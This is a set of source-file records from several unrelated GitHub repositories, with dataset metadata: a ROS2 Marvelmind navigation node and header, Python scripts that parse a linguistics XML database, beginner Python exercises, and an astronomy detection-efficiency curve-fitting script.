this->create_publisher<marvelmind_interfaces::msg::HedgeTelemetry>(HEDGE_TELEMETRY_TOPIC_NAME, qos);\n hedge_quality_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgeQuality>(HEDGE_QUALITY_TOPIC_NAME, qos);\n\n marvelmind_waypoint_publisher_ = this->create_publisher<marvelmind_interfaces::msg::MarvelmindWaypoint>(MARVELMIND_WAYPOINT_TOPIC_NAME, qos);\n}\n\nvoid MarvelmindNavigation::main_loop()\n{\n // RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"Running main loop at \" << this->now().seconds() );\n\n if (hedge->terminationRequired)\n {\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"Shutdown called from hedge->terminationRequired at \" << now().seconds());\n this->shutdown();\n }\n\n if (clock_gettime(CLOCK_REALTIME, &ts) == -1)\n {\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"clock_gettime error. 
Realtime: \" << CLOCK_REALTIME << \" vs ts: \" << ts.tv_sec);\n return;\n }\n ts.tv_sec += 2;\n sem_timedwait(sem,&ts);\n\n if (hedgeReceiveCheck())\n {\n // hedgehog data received\n RCLCPP_INFO(get_logger(), \"Address: %d, timestamp: %d, %d, X=%.3f Y= %.3f Z=%.3f Angle: %.1f flags=%d\",\n (int) hedge_pos_ang_msg.address,\n (int) hedge_pos_ang_msg.timestamp_ms,\n (int) (hedge_pos_ang_msg.timestamp_ms - hedge_timestamp_prev),\n (float) hedge_pos_ang_msg.x_m, (float) hedge_pos_ang_msg.y_m, (float) hedge_pos_ang_msg.z_m,\n (float) hedge_pos_ang_msg.angle,\n (int) hedge_pos_msg.flags);\n if(are_publishers_active_)\n {\n hedge_pos_ang_publisher_->publish(hedge_pos_ang_msg);\n hedge_pos_publisher_->publish(hedge_pos_msg);\n hedge_pos_noaddress_publisher_->publish(hedge_pos_noaddress_msg);\n }\n\n hedge_timestamp_prev= hedge_pos_ang_msg.timestamp_ms;\n }\n\n beaconReadIterations= 0;\n while(beaconReceiveCheck())\n {// stationary beacons data received\n RCLCPP_INFO(get_logger(), \"Stationary beacon: Address: %d, X=%.3f Y= %.3f Z=%.3f\",\n (int) beacon_pos_msg.address,\n (float) beacon_pos_msg.x_m, (float) beacon_pos_msg.y_m, (float) beacon_pos_msg.z_m);\n if(are_publishers_active_)\n {\n beacons_pos_publisher_->publish(beacon_pos_msg);\n }\n\n if ((beaconReadIterations++)>4)\n break;\n }\n\n if (hedgeIMURawReceiveCheck())\n {\n RCLCPP_INFO(get_logger(), \"Raw IMU: Timestamp: %08d, aX=%05d aY=%05d aZ=%05d gX=%05d gY=%05d gZ=%05d cX=%05d cY=%05d cZ=%05d\",\n (int) hedge_imu_raw_msg.timestamp_ms,\n (int) hedge_imu_raw_msg.acc_x, (int) hedge_imu_raw_msg.acc_y, (int) hedge_imu_raw_msg.acc_z,\n (int) hedge_imu_raw_msg.gyro_x, (int) hedge_imu_raw_msg.gyro_y, (int) hedge_imu_raw_msg.gyro_z,\n (int) hedge_imu_raw_msg.compass_x, (int) hedge_imu_raw_msg.compass_y, (int) hedge_imu_raw_msg.compass_z);\n if(are_publishers_active_)\n {\n hedge_imu_raw_publisher_->publish(hedge_imu_raw_msg);\n }\n }\n\n if (hedgeIMUFusionReceiveCheck())\n {\n RCLCPP_INFO(get_logger(), \"IMU fusion: Timestamp: %08d, X=%.3f Y= %.3f Z=%.3f q=%.3f,%.3f,%.3f,%.3f v=%.3f,%.3f,%.3f a=%.3f,%.3f,%.3f\",\n (int) hedge_imu_fusion_msg.timestamp_ms,\n (float) hedge_imu_fusion_msg.x_m, (float) hedge_imu_fusion_msg.y_m, (float) hedge_imu_fusion_msg.z_m,\n (float) hedge_imu_fusion_msg.qw, (float) hedge_imu_fusion_msg.qx, (float) hedge_imu_fusion_msg.qy, (float) hedge_imu_fusion_msg.qz,\n (float) hedge_imu_fusion_msg.vx, (float) hedge_imu_fusion_msg.vy, (float) hedge_imu_fusion_msg.vz,\n (float) hedge_imu_fusion_msg.ax, (float) hedge_imu_fusion_msg.ay, (float) hedge_imu_fusion_msg.az);\n if(are_publishers_active_)\n {\n hedge_imu_fusion_publisher_->publish(hedge_imu_fusion_msg);\n }\n }\n\n if (hedge->rawDistances.updated)\n {\n uint8_t i;\n for(i=0;i<4;i++)\n {\n getRawDistance(i);\n if (beacon_raw_distance_msg.address_beacon != 0)\n {\n RCLCPP_INFO(get_logger(), \"Raw distance: %02d ==> %02d, Distance= %.3f \",\n (int) beacon_raw_distance_msg.address_hedge,\n (int) beacon_raw_distance_msg.address_beacon,\n (float) beacon_raw_distance_msg.distance_m);\n if(are_publishers_active_)\n {\n beacon_distance_publisher_->publish(beacon_raw_distance_msg);\n }\n }\n }\n hedge->rawDistances.updated= false;\n }\n\n if (hedgeTelemetryUpdateCheck())\n {\n RCLCPP_INFO(get_logger(), \"Vbat= %.3f V, RSSI= %02d \",\n (float) hedge_telemetry_msg.battery_voltage,\n (int) hedge_telemetry_msg.rssi_dbm);\n if(are_publishers_active_)\n hedge_telemetry_publisher_->publish(hedge_telemetry_msg);\n }\n\n if (hedgeQualityUpdateCheck())\n {\n RCLCPP_INFO(get_logger(), 
\"Quality: Address= %d, Quality= %02d %% \",\n (int) hedge_quality_msg.address,\n (int) hedge_quality_msg.quality_percents);\n if(are_publishers_active_)\n hedge_quality_publisher_->publish(hedge_quality_msg);\n }\n\n if (marvelmindWaypointUpdateCheck())\n {\n int n= marvelmind_waypoint_msg.item_index+1;\n RCLCPP_INFO(get_logger(), \"Waypoint %03d/%03d: Type= %03d, Param1= %05d, Param2= %05d, Param3= %05d \",\n (int) n,\n (int) marvelmind_waypoint_msg.total_items, marvelmind_waypoint_msg.movement_type,\n marvelmind_waypoint_msg.param1, marvelmind_waypoint_msg.param2, marvelmind_waypoint_msg.param3);\n if(are_publishers_active_)\n marvelmind_waypoint_publisher_->publish(marvelmind_waypoint_msg);\n }\n\n}\n\n\nint main(int argc, char * argv[])\n{\n // force flush of the stdout buffer.\n // this ensures a correct sync of all prints\n // even when executed simultaneously within the launch file.\n setvbuf(stdout, NULL, _IONBF, BUFSIZ);\n \n rclcpp::init(argc, argv);\n\n rclcpp::executors::SingleThreadedExecutor exe;\n\n std::shared_ptr<MarvelmindNavigation> lc_node = std::make_shared<MarvelmindNavigation>(\"lc_marvel2\", argc, argv);\n \n exe.add_node(lc_node->get_node_base_interface());\n\n exe.spin();\n\n \n \n\n rclcpp::shutdown();\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.7501779198646545,
"alphanum_fraction": 0.7779359221458435,
"avg_line_length": 44.83333206176758,
"blob_id": "259ff2b3ee18d1181688c45dd4e697e6517196fb",
"content_id": "55e93e21cd25db114069a057303b5418e8be9822",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1405,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 30,
"path": "/marvelmind_nav/include/marvelmind_nav/marvelmind_example.h",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#ifndef __MARVELMIND_EXAMPLE_H_\r\n#define __MARVELMIND_EXAMPLE_H_\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include \"marvelmind_api.h\"\r\n\r\nbool marvelmindCheckVersionCommand(char *token);\r\nbool marvelmindCheckWakeCommand(char *token1, char *token2);\r\nbool marvelmindCheckSleepCommand(char *token1, char *token2);\r\nbool marvelmindCheckDefaultCommand(char *token1, char *token2);\r\nbool marvelmindCheckTelemetryCommand(char *token1, char *token2);\r\nbool marvelmindCheckSubmapCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckMapCommand(char *token1, char *token2);\r\nbool marvelmindCheckRateCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckUltrasoundCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckAxesCommand(char *token1, char *token2, char *token3, char *token4);\r\nbool marvelmindCheckReadDumpCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckWriteDumpCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckResetCommand(char *token1, char *token2);\r\nbool marvelmindCheckTemperatureCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckSetLocCommand(char *token1, char *token2, char *token3, char *token4, char *token5);\r\n\r\nbool marvelmindCycle();\r\nvoid marvelmindStart();\r\nvoid marvelmindFinish();\r\n\r\n#endif // __MARVELMIND_EXAMPLE_H_\r\n"
}
] | 19 |
kadim-git/Adnominal-possession
|
https://github.com/kadim-git/Adnominal-possession
|
2a433aa919401871f4658ba06d9da25e72e1c1cf
|
1d6a8bb02f2c95030c053e782248ed92be43c051
|
fd02b9a0af179802f6d637f58a4733cdb15d742b
|
refs/heads/master
| 2020-04-15T06:52:15.742495 | 2019-01-23T21:52:04 | 2019-01-23T21:52:04 | 164,476,785 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6766784191131592,
"alphanum_fraction": 0.6837455630302429,
"avg_line_length": 48.21739196777344,
"blob_id": "2ffd4a03f2d9b3029b85f824c101de5e6193d589",
"content_id": "959d02e874614c881d3c8ceb49297120a8c6d80c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 23,
"path": "/ScriptsPy/Script_InterchangableStr.py",
"repo_name": "kadim-git/Adnominal-possession",
"src_encoding": "UTF-8",
"text": "#For each language, this script extracts element InterchangableStr and shows its attributes: Word_changing, Factors affecting, Strategies\nimport xml.etree.ElementTree as ET\ntree = ET.parse('Database_merged_2017_07.xml')\nroot = tree.getroot()\nprint('Lang N, LangID, Interchangable Str N, Word_changing, Factors affecting, Strategies')\nfor langIter in range(len(root)):\n exampleStrats=root[langIter].findall('./GeneralInfo/InterchangeaStrategies/ExampleStr')\n if exampleStrats:\n for exampleIter in range(len(exampleStrats)):\n print(langIter, end=', ')\n print(root[langIter].find('./GeneralInfo/LangID').text, end=', ')\n print(exampleIter+1, end=',')\n \n print(exampleStrats[exampleIter].get('WordChanging'),',', exampleStrats[exampleIter].get('FactorsAffecting'),',', exampleStrats[exampleIter].get('Strategies'))\n else :\n print(langIter, end=', ')\n print(root[langIter].find('./GeneralInfo/LangID').text, end=', ')\n\n print(', , , ')\n \n # print(root[langIter].find('./GeneralInfo/LangID/InterchangeaStrategies/ExampleStr')[0].attrib)\n \n#exit()\n"
},
{
"alpha_fraction": 0.6844196915626526,
"alphanum_fraction": 0.6907790303230286,
"avg_line_length": 51.20833206176758,
"blob_id": "1ecc32e475980a88970798040beb5973a8bc2caa",
"content_id": "b7e699fdd23a1176c48c5deb7743892844325083",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 24,
"path": "/ScriptsPy/Script_3_1.py",
"repo_name": "kadim-git/Adnominal-possession",
"src_encoding": "UTF-8",
"text": "#ТThis scrip gives the content of GramDefLabel only for pronominal possession\nimport xml.etree.ElementTree as ET\n#tree = ET.parse('Database_merged_2017_07.xml')\ntree = ET.parse('Database_merged.xml')\nroot = tree.getroot()\nprint('N, LangID, StrategyID/Type, GramDefLabel')\nfoundCounter=0\n#nodes=list(['Possession/PronominalPossession/*','Possession/PronominalPossession/StrategyPronom/StrategyNotFound','Possession/PronominalPossession/StrategyPronomNonCanonical'])\nfor lang in root[:]:\n #tempFound=lang.findall('./Possession/PronominalPossession/StrategyPronom')\n #tempFound=lang.findall('./Possession/PronominalPossession/*')\n tempFound=lang.findall('./Possession/*/*')\n # print(len(tempFound))\n for strat in tempFound:\n tempMorphemePron=strat.findall('./Morphology/*/[@GramDefLabel]')\n #if tempMorphemePron:\n for tempMorpeme in strat.findall('./Morphology/*/[@GramDefLabel]'):\n foundCounter+=1\n print(foundCounter,lang.find('GeneralInfo/LangID').text, end=' ')\n # print(',',strat.attrib,end=' ')\n print(',','ID='+strat.get('StrategyID')+' '+strat.tag,end=' ')\n # print(',',tempMorphemePron.attrib)\n print(',',tempMorpeme.get('GramDefLabel'))\nprint('')\n \n"
},
{
"alpha_fraction": 0.7759336233139038,
"alphanum_fraction": 0.7831950187683105,
"avg_line_length": 72.76923370361328,
"blob_id": "5dfa0cde9cc36cf39f032c173ee86600e6eab16a",
"content_id": "ec6ad152dcce0c19438a303db95aae39c2e5759d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 964,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 13,
"path": "/ScriptsPy/Script_1_lena.py",
"repo_name": "kadim-git/Adnominal-possession",
"src_encoding": "UTF-8",
"text": "#modified by Lena. This script extracts the number of strategies for every language: Pronominal (including non canonical strategies), Nominal (including non canonical strategies)\nimport xml.etree.ElementTree as ET\ntree = ET.parse('Database_merged_2017_07.xml')\nroot = tree.getroot()\nprint('LangID, PronominalPossession, StrategyNotFound, StrategyPronomNonCanonical, NominalPossession, StrategyNotFound, StrategyNomNotCanonical')\nnodes=list(['Possession/PronominalPossession/*','Possession/PronominalPossession/StrategyNotFound','Possession/PronominalPossession/StrategyPronomNonCanonical'])\nnodes=nodes+['Possession/NominalPossession/*','Possession/NominalPossession/StrategyNotFound','Possession/NominalPossession/StrategyNomNonCanonical']\nfor lang in root:\n print(lang.find('GeneralInfo/LangID').text, end=' ')\n for node in nodes:\n tempFound=lang.findall(node)\n print(',',len(tempFound) if tempFound else 0, end=' ') \n print('')\n \n"
}
] | 3 |
nikolozi2001/negar-s-projects
|
https://github.com/nikolozi2001/negar-s-projects
|
8155c27b3f6f1f3cbeff28242114e23bc2f09c09
|
50047b6c227304f574ab0b4feff0f6fcf52cdb5f
|
f60579efe83dc1a63de8621e53dc4e69e0ef0d04
|
refs/heads/main
| 2023-04-21T21:29:49.475791 | 2021-05-04T18:40:26 | 2021-05-04T18:40:26 | 360,517,578 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7982062697410583,
"alphanum_fraction": 0.8161435127258301,
"avg_line_length": 36.33333206176758,
"blob_id": "5cb2ce83c4146ea5fde67f07ec8e731362c00c34",
"content_id": "06591e3a64b56c8979365ecd765491c2c480191f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 6,
"path": "/other-materials/Readme.md",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "This is a course from udemy\n\n2021 Complete Python Bootcamp From Zero to Hero in Python\n\nAbout this course\nLearn Python like a Professional Start from the basics and go all the way to creating your own applications and games"
},
{
"alpha_fraction": 0.6322751045227051,
"alphanum_fraction": 0.6494709253311157,
"avg_line_length": 20,
"blob_id": "b1caf948dcd627461a74b2fe6efefe029650d7d8",
"content_id": "7114a26c6d5efb55046712b9f51685df7c091d1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 756,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 36,
"path": "/first-project/magic8.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "import random\nimport time\n\nname = \"Nika\"\n\nquestion = \"Will I win the lottery?\"\n\nanswer = \"\"\n\nrandomNumber = random.randint(1, 9)\n\nif randomNumber == 1:\n print('Yes - definitely.')\nelif randomNumber == 2:\n print(\"It is decidedly so.\")\nelif randomNumber == 3:\n print(\"Without a doubt.\")\nelif randomNumber == 4:\n print(\"Reply hazy, try again.\")\nelif randomNumber == 5:\n print(\"Ask again later.\")\nelif randomNumber == 6:\n print(\"Better not tell you now.\")\nelif randomNumber == 7:\n print(\"My sources say no.\")\nelif randomNumber == 8:\n print(\"Outlook not so good.\")\nelif randomNumber == 9:\n print(\"Very doubtful.\")\nelse:\n answer = \"Error\"\n\nprint(name + \" asks: \" + question)\nprint(\"Magic 8-Ball's answer: \" + answer)\n\ntime.sleep(2)\n"
},
{
"alpha_fraction": 0.5753228068351746,
"alphanum_fraction": 0.6131038069725037,
"avg_line_length": 13.690140724182129,
"blob_id": "7ebbbeb6f30d106c6b237fb2d3c2e74240586984",
"content_id": "71e8ac68a650dd8a29783d735aecdabb77eaace5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2091,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 142,
"path": "/first-project/controlFlow.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "def line():\n print(\"--------------------------------------------------\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#Boolean Expressions\n# print(1==1)\n\n# print(1!=1)\n\n# print(2!=1)\n\n# line()\n\n# Task : figure out whether (2=='2') is true or false.why?\n# print(2=='2')\n# print(type(2))\n\n#line()\n# Boolean Variables\n\n# my_variable = True\n# my_variable_2 = 33/3!=22/11\n# print(my_variable)\n# print(my_variable_2)\n\n\n\n#line()\n\n#If Statements\n\n# is_raining = False\n# if (is_raining):\n# print(\"bring an umbrella\")\n\n# isSaturday = False\n# if (isSaturday):\n# print(\"you can wake up late!\")\n\n\n\n\n#line()\n\n#Age Control Task\n\n# age = 15\n\n# if age<=13:\n# print(\"you're not allowed in the cinema!\")\n\n\n\n#line()\n\n#print(\"AND Operator -> and combines two boolean expressions and \n# evaluates as True if both its components are True, but False otherwise.\")\n\n# and_1 = (2 < 0) and True \n# print(and_1)\n\n\n\n\n#line()\n\n#print(\"OR Operator -> combines two expressions into a larger expression \n# that is True if either component is True.\")\n\n# or_1 = (1 - 1 == 0) or False\n# or_2 = (2 < 0) or True \n# or_3 = (3 == 8) or (3 > 4) \n\n# print(or_1)\n# print(or_2)\n# print(or_3)\n\n\nline()\n#print(\"NOT Operator -> when applied to any boolean expression, it\n# reverses the boolean value.\")\n\n\n# print(not (True == False))\n# print(not 2 == 2)\n\n# not_1 = not 1 > 4\n# print(not_1)\n\n\n\n\n\n\n#else statements:\nage = 12\nif (age >= 13):\n print(\"Access granted.\")\nelse:\n print(\"Sorry, you must be 13 or older to watch this movie.\")\n\n\n\n\n\n#Else If Statements\n\nprint(\"Thank you for the donation!\")\ndonation = 5678\nif (donation >= 1000):\n print(\"You've achieved platinum status\")\nelif (donation >= 500):\n print(\"You've achieved gold donor status\")\nelif (donation >= 100):\n print(\"You've achieved silver donor status\")\nelse:\n print(\"You've achieved bronze donor status\")\n\n# if (donation >= 1000):\n# print(\"You've achieved platinum status\")\n# if (donation >= 500):\n# print(\"You've achieved gold donor status\")\n# if (donation >= 100):\n# print(\"You've achieved silver donor status\")\n# else:\n# print(\"You've achieved bronze donor status\")\n\n\n\n "
},
{
"alpha_fraction": 0.6876190304756165,
"alphanum_fraction": 0.7200000286102295,
"avg_line_length": 20.040000915527344,
"blob_id": "d9f75c09489487ad2f7babf8266936a5041068f0",
"content_id": "58e777c050b54227b1c94fd3e2af683e444d7118",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/second-project/GradeBook.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "subjects = [\"phisics\", \"calculus\", \"poetry\", \"history\"]\ngrades = [98, 97, 85, 88]\n\nGradeBook = zip(subjects,grades)\nprint(list(GradeBook))\n\n#added more subjects\n\nsubjects.append(\"computer science\")\ngrades.append(100)\n\nGradeBook = zip(subjects,grades)\nprint(list(GradeBook))\n\ngrade_book = list(GradeBook)\n\ngrade_book.append([\"visual arts\", 93])\n# (7) modify gradebook\n\ngrades[4] += 5\nprint(list(grade_book))\n\n#here starts last semester gradebook\n\nsubjects2 = [\"ethical hacking\", \"cyber security\", \"IoT\", \"artifical intellect\"]"
},
{
"alpha_fraction": 0.4893617033958435,
"alphanum_fraction": 0.5531914830207825,
"avg_line_length": 15.269230842590332,
"blob_id": "fca6cda63157feac119655fad985ea38db3662bb",
"content_id": "b6f59dc36d7e73e06d80dedaa74cb6c4cb9a449d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 26,
"path": "/other-materials/learn.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "# Task1 from docs\n\n# names = ['Felix', 'Aaron']\n# ages = [19, 16]\n\n\n\n# name_one = ['Felix is', 19]\n# print(name_one)\n\n# name_two = ['Aaron is', 16]\n# print(name_two)\n\n# names_and_ages = [['Felix', 19], ['Aaron', 16]]\n# print(names_and_ages)\n\n# nameAndAges = {'Felix':19, 'Aaron':16}\n# print(nameAndAges)\n\nx = [1, 2, 3]\ny = [4, 5, 6]\nzipped = zip(x, y)\nlist(zipped)\n\nx2, y2 = zip(*zip(x, y))\nx == list(x2) and y == list(y2)\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 30,
"blob_id": "d7c44b7eb7ea4145bbba12dc057ac272932c8c52",
"content_id": "4dc838224e02b3c464385e4fad7510ddb6c888ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 2,
"path": "/README.md",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "# negar-s-projects\nCodecademy Machine Learning and AI/Tbilisi \n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.7129629850387573,
"avg_line_length": 31.100000381469727,
"blob_id": "80207d000b2a6669b536bc97150500f9dd426759",
"content_id": "044f453d122b065099ff7ae5542f3452ed459cee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 10,
"path": "/second-project/search-trends.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "\n\n\nsearch_title = ['The Grand National', 'Prince Philip', 'Pub', 'Line Of Duty', 'Gym']\n\nsearch_increase = [1950, 550, 160, 130, 90]\n\nsearch_title_and_increase = zip(search_title,search_increase)\n#search_title_and_increase = search_title + search_increase\n\nprint(list(search_title_and_increase))\n\n#print(search_title_and_increase)\n"
}
] | 7 |
sjhamil/detectioneff_Y1
|
https://github.com/sjhamil/detectioneff_Y1
|
cefe39e63f08c57fa97045be378f77c2f12c9a0b
|
5578b21a54d0c1899acfffb02119da0f048e5482
|
04a71a00431442d4a13824f27b208c187cb249da
|
refs/heads/master
| 2016-05-26T12:33:30.560129 | 2015-07-16T02:07:40 | 2015-07-16T02:07:40 | 39,165,050 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6014934778213501,
"alphanum_fraction": 0.6212549209594727,
"avg_line_length": 35.12171173095703,
"blob_id": "fed5eb008d409f5ea4a490fccb2401534469c336",
"content_id": "c368218d38f7ec9d4698bb0c6196358e931588ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10981,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 304,
"path": "/get_effs.py",
"repo_name": "sjhamil/detectioneff_Y1",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nfrom __future__ import division\nimport os.path\nimport sys\nimport easyaccess as ea\nimport numpy as np\nfrom numpy import tanh\nimport ephem\nimport string\nimport re\nimport csv\nfrom Tools.ccdBounds import *\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom scipy.optimize import curve_fit\n\n\n#Standard function for connecting to DESDM via easyaccess\ndef db_connect(section=''):\n db = ea.connect(section=section)\n cursor=db.cursor()\n return cursor, db\n\n\n#Compute which chip an object is/would be seen on given object ra,dec and telecope ra,dec\ndef compute_chip(rockra, rockdec, expra, expdec):\n '''\n Given the ra and dec of a point and of the center of an exposure, find the CCD containing that point.\n Returns a pair of the CCD name and number.\n '''\n deltara = 180/np.pi*ephem.degrees(rockra-expra).znorm # compute difference in degrees (normalized between -180, +180)\n deltadec = 180/np.pi*ephem.degrees(rockdec-expdec).znorm # the 180/pi is because ephem.Angle objects are natively in radians\n ccdname = 'None'\n for k in ccdBounds:\n if deltara > ccdBounds[k][0] and deltara < ccdBounds[k][1] and deltadec > ccdBounds[k][2] and deltadec < ccdBounds[k][3]:\n ccdname = k\n return ccdname, ccdNum[ccdname], deltara, deltadec\n\n\n\n#Check whether data needs to be fetched from the DB\ndef check_files(in_filename):\n in_filename_ext = in_filename.split('.')[-1]\n\n if in_filename_ext=='csv':\n if not os.path.exists(in_filename):\n print \"\\nFile \"+in_filename+\" does not exist!\"\n sys.exit(0)\n else:\n out_filename = in_filename\n print \"\\nUsing file \"+in_filename+\" for data\\n\"\n elif in_filename_ext=='sql':\n out_filename = 'query_output/'+re.split('[/.]',in_filename)[1]+'.csv'\n if not os.path.exists(out_filename):\n print \"\\n\"+out_filename+\" does not exist, fetching data\"\n fetch_data(in_filename, out_filename)\n elif os.path.getctime(in_filename)>os.path.getctime(out_filename):\n #print \"Embed input SQL newer than output csv, really fetch data?\"\n to_fetch_data = raw_input(\"\\n\"+in_filename+\" newer than \"+out_filename+\", fetch data? y/n: \")\n if to_fetch_data=='y':\n fetch_data(in_filename, out_filename)\n else:\n print \"Using file \"+out_filename+\" for data\\n\"\n else:\n print \"\\nUsing file \"+out_filename+\" for data\"\n\n return out_filename\n\n\n#Connect to database, load and execute query from SQL file, save data to csv file\ndef fetch_data(infile='', outfile=''):\n #Check provided file exists\n if not os.path.exists(infile):\n print (\"File '\"+infile+\"'does not exist!\")\n sys.exit(0)\n \n cursor, connection = db_connect('desoper')\n\n #Execute query for embedded data\n query = connection.loadsql(infile)\n print \"\\nExecuting the following query: '\"+query+\"'\\n\"\n connection.query_and_save(query, outfile)\n\n\n#Parse data file, returns dictonary whose keys are the exposure numbers and values are a list of each object and its properties associated with that expnum\ndef parse_data(data_file=''):\n if not os.path.exists(data_file):\n print \"File '\"+data_file+\"' does not exist!\"\n sys.exit(0)\n\n data_by_exp = defaultdict(list) #Dict whose keys are the expnums, values are list of dictionaries with info about each object from that expnum\n cnt_fakesperccd = defaultdict(lambda: defaultdict(int)) #Dict of form { expnum:{1:## 2:## ...} ... 
} where ## = fakes on that CCD\n\n with open(data_file) as csvfile:\n reader = csv.DictReader(csvfile,delimiter=',')\n for row in reader:\n data_by_exp[row['EXPNUM']].append(row)\n cnt_fakesperccd[row['EXPNUM']][int(row['CCDNUM'])] += 1\n\n exp_list = data_by_exp.keys()\n exp_list.sort()\n \n return exp_list, data_by_exp, cnt_fakesperccd\n\n\n#Write data to file, assumes input is a simple dictionary, also takes list of columns headers and outfile name as input\ndef write_curvefit(data_dict, header_list, outfile_name=''):\n with open(outfile_name, 'wb') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(header_list)\n\n for k,v in data_dict.iteritems():\n writer.writerow([k]+v)\n\n\n#Function used to fit the efficiency curves\n#Using a single tanh function\ndef fit_func(x,eff_max,mag50,width):\n return 0.5*eff_max*(1-tanh((x-mag50)/width))\n\n\n#Using a double tanh function\ndef fit_func2(x,eff_max,mag25,width1,width2):\n return 0.25*eff_max*(1-tanh((x-mag25)/width1))*(1-tanh((x-mag25)/width2))\n\n\n#Given the axis object, x data points, y data points, fit a curve to the data\n#Using fit_func -> single tanh\ndef fit_data(axis, x_data, y_data):\n param, cov_matrix = curve_fit(fit_func,x_data,y_data,p0=(1.0,23.0,0.6))\n \n p1 = param[0]\n p2 = param[1]\n p3 = param[2]\n residuals = y_data - fit_func(x_data,p1,p2,p3)\n chi_sq = sum(residuals**2)\n\n xaxis = np.linspace(19.5,28.0,150)\n fit_curve = fit_func(xaxis,p1,p2,p3)\n\n axis.plot(xaxis,fit_curve,'-')\n axis.text(26,1.5,'$\\chi^2$ = '+str(chi_sq))\n \n return axis, param, chi_sq\n \n#Using fit_func2 -> double tanh\ndef fit_data2(axis, x_data, y_data):\n param, cov_matrix = curve_fit(fit_func2,x_data,y_data,p0=(1.0,23.0,0.6,0.6))\n \n p1 = param[0]\n p2 = param[1]\n p3 = param[2]\n p4 = param[3]\n residuals = y_data - fit_func2(x_data,p1,p2,p3,p4)\n chi_sq = sum(residuals**2)\n\n xaxis = np.linspace(19.5,28.0,150)\n fit_curve = fit_func2(xaxis,p1,p2,p3,p4)\n\n axis.plot(xaxis,fit_curve,'-')\n axis.text(26,1.5,'$\\chi^2$ = '+str(chi_sq))\n\n return axis, param, chi_sq\n \n\n\ndef main():\n '''Usage: python get_data.py <embedfile_base> <foundfile_base> optional:<curvefit_type>'''\n\n\n #Parse command line arguments. 
